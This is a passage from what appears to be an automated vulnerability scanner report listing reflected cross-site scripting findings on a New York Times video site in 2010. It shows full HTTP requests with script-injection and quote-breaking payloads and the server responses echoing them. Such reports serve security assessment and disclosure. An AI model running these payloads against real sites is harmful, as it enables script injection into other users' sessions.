This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/23/world96257'%3be85a1e8f6a1/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:09 GMT
Content-type: text/html
Content-Length: 242027

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
ul%20hipness%20to%20cities.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'world96257';e85a1e8f6a1' );
}
function getShareSubSection() {
return( 'asia' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeUR
...[SNIP]...

3.319. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e929"%3bc83276095a3 was submitted in the REST URL parameter 5. This input was echoed as 4e929";c83276095a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/23/world4e929"%3bc83276095a3/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:24 GMT
Content-type: text/html
Content-Length: 242027

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytworld4e929";c83276095a3";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "world4e929";c83276095a3";
var s_prop2 = "asia";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.320. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 376ae"%3b001983fed65 was submitted in the REST URL parameter 6. This input was echoed as 376ae";001983fed65 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/23/world/asia376ae"%3b001983fed65/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:19:35 GMT
Content-type: text/html
Content-Length: 242009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytworld";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "world";
var s_prop2 = "asia376ae";001983fed65";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.321. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91084'%3bc5f256392f0 was submitted in the REST URL parameter 6. This input was echoed as 91084';c5f256392f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/23/world/asia91084'%3bc5f256392f0/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:20:22 GMT
Content-type: text/html
Content-Length: 242009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
ds() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'world' );
}
function getShareSubSection() {
return( 'asia91084';c5f256392f0' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURIComponent( '' ) );
}
function getSharePubdate() {
r
...[SNIP]...

3.322. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8a2"><script>alert(1)</script>bd3f56b5186 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/23/world/asia5f8a2"><script>alert(1)</script>bd3f56b5186/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:19:19 GMT
Content-type: text/html
Content-Length: 233687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/23/world/asia5f8a2"><script>alert(1)</script>bd3f56b5186/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.323. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0938"><script>alert(1)</script>574cb9b6872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html?f0938"><script>alert(1)</script>574cb9b6872=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:13:12 GMT
Content-type: text/html
Content-Length: 241979

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html?f0938"><script>alert(1)</script>574cb9b6872=1">
...[SNIP]...

3.324. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3809"><script>alert(1)</script>a5021a67302 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010e3809"><script>alert(1)</script>a5021a67302/10/25/continuous/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:15:25 GMT
Content-type: text/html
Content-Length: 233672

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010e3809"><script>alert(1)</script>a5021a67302/10/25/continuous/1248069237870/timescast-october-25-2010.html">
...[SNIP]...

3.325. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a8e"><script>alert(1)</script>8d76ccd81b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10c2a8e"><script>alert(1)</script>8d76ccd81b/25/continuous/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:03 GMT
Content-type: text/html
Content-Length: 233670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10c2a8e"><script>alert(1)</script>8d76ccd81b/25/continuous/1248069237870/timescast-october-25-2010.html">
...[SNIP]...

3.326. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e3a1"><script>alert(1)</script>c8f7feac5ae was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/255e3a1"><script>alert(1)</script>c8f7feac5ae/continuous/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:27 GMT
Content-type: text/html
Content-Length: 233673

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/255e3a1"><script>alert(1)</script>c8f7feac5ae/continuous/1248069237870/timescast-october-25-2010.html">
...[SNIP]...

3.327. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30405"%3b9a4b8fb4adb was submitted in the REST URL parameter 5. This input was echoed as 30405";9a4b8fb4adb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/25/continuous30405"%3b9a4b8fb4adb/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:52 GMT
Content-type: text/html
Content-Length: 226232

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytcontinuous30405";9a4b8fb4adb";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "continuous30405";9a4b8fb4adb";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.328. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc3df"><script>alert(1)</script>c5b30a54997 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/25/continuousfc3df"><script>alert(1)</script>c5b30a54997/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:43 GMT
Content-type: text/html
Content-Length: 226438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/25/continuousfc3df"><script>alert(1)</script>c5b30a54997/1248069237870/timescast-october-25-2010.html">
...[SNIP]...

3.329. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da116'%3b25c407da1e0 was submitted in the REST URL parameter 5. This input was echoed as da116';25c407da1e0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/25/continuousda116'%3b25c407da1e0/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
